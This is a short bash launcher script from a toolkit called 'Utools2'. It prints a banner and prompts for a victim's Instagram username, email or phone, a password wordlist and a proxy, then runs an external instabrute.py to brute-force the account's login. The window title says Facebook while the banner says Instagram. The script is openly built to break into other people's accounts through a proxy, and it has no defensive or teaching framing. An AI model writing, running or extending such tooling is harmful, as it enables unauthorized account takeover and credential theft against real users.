#!/bin/bash
#Project Utools2
#Project From Joy JoyGhosh
#Joychondroghosh@gmail.com
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
echo -ne "\033]0;FacebookBruteforceTool(Easycli)(Utools)\007"
resize -s 24 109
clear
echo -e """${yellow}
           _________________________________________________________________________
            ██╗   ██╗████████╗ ██████╗  ██████╗ ██╗     ███████╗██████╗     ██████╗
            ██║   ██║╚══██╔══╝██╔═══██╗██╔═══██╗██║     ██╔════╝╚════██╗   ██╔═████╗
            ██║   ██║   ██║   ██║   ██║██║   ██║██║     ███████╗ █████╔╝   ██║██╔██║
            ██║   ██║   ██║   ██║   ██║██║   ██║██║     ╚════██║██╔═══╝    ████╔╝██║
            ╚██████╔╝   ██║   ╚██████╔╝╚██████╔╝███████╗███████║███████╗██╗╚██████╔╝
             ╚═════╝    ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝
             ______________________________________________________________________
                                        BY JOY GHOSH
             ----------------------------------------------------------------------
"""
echo -e """${blue}
            =======================================================================
            |                     Instagram Bruteforce Tools                       |
            =======================================================================
"""
read -p "Enter Victmis Account Username/Email/Phone::" user
read -p "Drag And Drop Your Word list here delete any coma or symbol from path:::" pass
read -p "Enter The Proxy :::" proxy
cd instabrute
python instabrute.py -u $user -w $pass -p $proxy
read -p "press any key to return ..."
cd ..
